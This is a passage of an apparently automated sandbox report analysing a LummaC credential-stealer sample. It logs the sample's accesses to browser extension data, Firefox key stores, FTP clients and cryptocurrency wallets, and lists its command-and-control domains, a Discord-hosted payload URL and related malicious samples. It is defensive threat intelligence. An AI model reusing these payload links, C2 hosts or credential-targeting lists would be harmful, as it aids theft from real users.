      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Tries to harvest and steal ftp login credentials
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Tries to steal Crypto Currency Wallets
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\MQAWXUYAIKJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
      Windows Management Instrumentation      		1
      DLL Side-Loading      		12
      Process Injection      		11
      Masquerading      		2
      OS Credential Dumping      		221
      Security Software Discovery      		Remote Services11
      Input Capture      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		11
      Input Capture      		21
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Archive Collected Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
      Process Injection      		Security Account Manager3
      Process Discovery      		SMB/Windows Admin Shares31
      Data from Local System      		4
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS13
      File and Directory Discovery      		Distributed Component Object Model1
      Clipboard Data      		15
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets24
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      MotivatedFunded.exe24%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\755831\Dl.com0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://aleksandr-block.com/api100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      aleksandr-block.com
      		188.114.96.3
      		truefalse
        		high
        steamcommunity.com
        		104.102.49.254
        		truefalse
          		high
          cdn.discordapp.com
          		162.159.135.233
          		truefalse
            		high
            bustlingwakef.click
            		unknown
            		unknowntrue
              		unknown
              washyceehsu.lat
              		unknown
              		unknowntrue
                		unknown
                kickykiduz.lat
                		unknown
                		unknowntrue
                  		unknown
                  bloodyswif.lat
                  		unknown
                  		unknowntrue
                    		unknown
                    savorraiykj.lat
                    		unknown
                    		unknowntrue
                      		unknown
                      miniatureyu.lat
                      		unknown
                      		unknowntrue
                        		unknown
                        finickypwk.lat
                        		unknown
                        		unknowntrue
                          		unknown
                          klipjarifaa.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            shoefeatthe.lat
                            		unknown
                            		unknowntrue
                              		unknown
                              HQzhESZXqNmORNSM.HQzhESZXqNmORNSM
                              		unknown
                              		unknowntrue
                                		unknown
                                leggelatez.lat
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  https://steamcommunity.com/profiles/76561199724331900false
                                    		high
                                    https://cdn.discordapp.com/attachments/1316097521088725107/1326268620199821485/ButtsStories.exe?ex=677ecf67&is=677d7de7&hm=1e05b1f0911094424256d31f3027d83b523b5b02b9d8bf298fea63f1f6e5a38b&false
                                      		high
                                      https://aleksandr-block.com/apitrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://upx.sf.netAmcache.hve.13.drfalse
                                        		high
                                        http://www.autoitscript.com/autoit3/XDl.com, 0000000D.00000000.2210897237.0000000000C45000.00000002.00000001.01000000.00000007.sdmp, Barbados.9.dr, Dl.com.2.drfalse
                                          		high
                                          http://nsis.sf.net/NSIS_ErrorErrorMotivatedFunded.exefalse
                                            		high
                                            https://www.autoitscript.com/autoit3/Sv.9.dr, Dl.com.2.drfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              188.114.96.3
                                              		aleksandr-block.comEuropean Union
                                              		13335CLOUDFLARENETUSfalse
                                              104.102.49.254
                                              		steamcommunity.comUnited States
                                              		16625AKAMAI-ASUSfalse
                                              162.159.135.233
                                              		cdn.discordapp.comUnited States
                                              		13335CLOUDFLARENETUSfalse

                                              General Information

                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1591972
                                              Start date and time:2025-01-15 16:00:14 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 6m 1s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:17
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:MotivatedFunded.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@27/25@14/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 35
                                              • Number of non-executed functions: 37
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.12.23.50
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              10:01:19API Interceptor1x Sleep call for process: MotivatedFunded.exe modified
                                              10:01:23API Interceptor13x Sleep call for process: Dl.com modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              188.114.96.3http://www.brillflooring.comGet hashmaliciousUnknownBrowse
                                              • www.brillflooring.com/
                                              New Order#12125.exeGet hashmaliciousFormBookBrowse
                                              • www.cifasnc.info/8rr3/
                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                              • www.cifasnc.info/8rr3/
                                              1001-13.exeGet hashmaliciousFormBookBrowse
                                              • www.einpisalpace.shop/pgw3/
                                              trow.exeGet hashmaliciousUnknownBrowse
                                              • www.tc17.com/
                                              HN1GiQ5tF7.exeGet hashmaliciousFormBookBrowse
                                              • www.questmatch.pro/ipd6/
                                              AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                              • www.zkdamdjj.shop/kf1m/
                                              XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                              • www.einpisalpace.shop/8g74/?wtE0B=1LjxZz&9F=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO
                                              tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                              • www.zkdamdjj.shop/kf1m/
                                              M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                              • www.zkdamdjj.shop/kf1m/
                                              104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                              • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                              http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                              • www.valvesoftware.com/legal.htm
                                              162.159.135.233Cheat.Lab.2.7.2.msiGet hashmaliciousRedLineBrowse
                                              • cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
                                              #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeGet hashmaliciousUnknownBrowse
                                              • cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
                                              QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
                                              • cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
                                              We7WnoqeXe.exeGet hashmaliciousAmadey RedLineBrowse
                                              • cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
                                              mosoxxxHack.exeGet hashmaliciousAmadey RedLineBrowse
                                              • cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
                                              Sales-contract-deaho-180521-poweruae.docGet hashmaliciousUnknownBrowse
                                              • cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
                                              PURCHASE ORDER E3007921.EXEGet hashmaliciousSnake KeyloggerBrowse
                                              • cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
                                              Waybill Document 22700456.exeGet hashmaliciousNanocoreBrowse
                                              • cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
                                              COMPANY REQUIREMENT.docGet hashmaliciousSnake KeyloggerBrowse
                                              • cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              steamcommunity.com00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                              • 23.47.27.74
                                              00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                              • 104.102.49.254
                                              92.255.57_1.112.ps1Get hashmaliciousLummaCBrowse
                                              • 104.102.49.254
                                              https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                              • 104.102.49.254
                                              62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                              • 104.102.49.254
                                              lumma1.exeGet hashmaliciousLummaCBrowse
                                              • 104.102.49.254
                                              random.exeGet hashmaliciousLummaCBrowse
                                              • 104.102.49.254
                                              yTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
                                              • 104.102.49.254
                                              XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                              • 104.102.49.254
                                              k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                              • 104.102.49.254
                                              aleksandr-block.com62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                              • 188.114.97.3
                                              random.exeGet hashmaliciousLummaCBrowse
                                              • 188.114.97.3
                                              yTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
                                              • 188.114.96.3
                                              XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                              • 188.114.96.3
                                              k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                              • 188.114.96.3
                                              92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
                                              • 188.114.96.3
                                              cdn.discordapp.comSample1.exeGet hashmaliciousUnknownBrowse
                                              • 162.159.134.233
                                              Sample1.exeGet hashmaliciousUnknownBrowse
                                              • 162.159.130.233
                                              gshv2.exeGet hashmaliciousUnknownBrowse
                                              • 162.159.129.233
                                              PO_11171111221.Vbs.vbsGet hashmaliciousFormBookBrowse
                                              • 162.159.129.233
                                              WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                              • 162.159.129.233
                                              sNifdpWiY9.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                              • 162.159.134.233
                                              EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                              • 162.159.129.233
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 162.159.135.233
                                              file.exeGet hashmaliciousCStealerBrowse
                                              • 162.159.134.233
                                              https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4&Get hashmaliciousUnknownBrowse
                                              • 162.159.135.233

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUSSet-Up.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.75.15
                                              http://www.mcpf.co.zaGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              ActiVe_Ver_Set-UpFilE.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.192.161
                                              Personliche Nachricht fur e4060738.pdfGet hashmaliciousUnknownBrowse
                                              • 104.18.95.41
                                              https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U#d2F0c29uLmJlY2t5QGFpZGIub3JnGet hashmaliciousPhisherBrowse
                                              • 172.66.0.235
                                              https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U#d2F0c29uLmJlY2t5QGFpZGIub3JnGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              asB3nE8eVsGet hashmaliciousUnknownBrowse
                                              • 172.66.0.227
                                              https://ummi.asir.com.ar/Get hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              https://aMER.ethamoskag.ru/0cUrcw3/#Mbob@bobco.comGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61fGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              CLOUDFLARENETUSSet-Up.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.75.15
                                              http://www.mcpf.co.zaGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              ActiVe_Ver_Set-UpFilE.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.192.161
                                              Personliche Nachricht fur e4060738.pdfGet hashmaliciousUnknownBrowse
                                              • 104.18.95.41
                                              https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U#d2F0c29uLmJlY2t5QGFpZGIub3JnGet hashmaliciousPhisherBrowse
                                              • 172.66.0.235
                                              https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpshieldnemt.com%2525252Fwp%25252FGnrm%25252FJ6y6AQ%25252FAQ%25252Fe40c43dd-851b-4580-9323-fb61c1f4e855%25252F1%25252FDz8wyx-xnG%252FGnrm%252FK6y6AQ%252FAQ%252F08a87d58-9017-42a2-87a2-16d811ad0020%252F1%252FAQhuEqjtZr%2FGnrm%2FLKy6AQ%2FAQ%2Ff082e7c9-7f04-4f29-b74f-bf5134bab4b2%2F1%2F6eo6CGyRlQ/Gnrm/Lay6AQ/AQ/e23803d3-ac37-4b0c-9ec4-0cf79f1109e9/1/9Hx062h64U#d2F0c29uLmJlY2t5QGFpZGIub3JnGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              asB3nE8eVsGet hashmaliciousUnknownBrowse
                                              • 172.66.0.227
                                              https://ummi.asir.com.ar/Get hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              https://aMER.ethamoskag.ru/0cUrcw3/#Mbob@bobco.comGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61fGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              AKAMAI-ASUSarm4.elfGet hashmaliciousMiraiBrowse
                                              • 23.3.198.114
                                              https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61fGet hashmaliciousUnknownBrowse
                                              • 23.201.255.95
                                              178.215.238.129-x86-2025-01-15T04_59_51.elfGet hashmaliciousMiraiBrowse
                                              • 23.54.60.112
                                              00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                              • 23.47.27.74
                                              00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                              • 104.102.49.254
                                              92.255.57_1.112.ps1Get hashmaliciousLummaCBrowse
                                              • 104.102.49.254
                                              mips.elfGet hashmaliciousMiraiBrowse
                                              • 23.54.60.125
                                              EXTERNAL Your company's credit limit has changed!.msgGet hashmaliciousUnknownBrowse
                                              • 184.28.89.29
                                              https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                              • 104.102.49.254
                                              https://www.giselabravo.com/lblogin/loginsGet hashmaliciousUnknownBrowse
                                              • 104.102.53.18

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              a0e9f5d64349fb13191bc781f81f42e1Set-Up.exeGet hashmaliciousLummaCBrowse
                                              • 104.102.49.254
                                              • 162.159.135.233
                                              • 188.114.96.3
                                              ActiVe_Ver_Set-UpFilE.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.102.49.254
                                              • 162.159.135.233
                                              • 188.114.96.3
                                              00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                              • 104.102.49.254
                                              • 162.159.135.233
                                              • 188.114.96.3
                                              00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                              • 104.102.49.254
                                              • 162.159.135.233
                                              • 188.114.96.3
                                              138745635-72645747.116.exeGet hashmaliciousUnknownBrowse
                                              • 104.102.49.254
                                              • 162.159.135.233
                                              • 188.114.96.3
                                              92.255.57_1.112.ps1Get hashmaliciousLummaCBrowse
                                              • 104.102.49.254
                                              • 162.159.135.233
                                              • 188.114.96.3
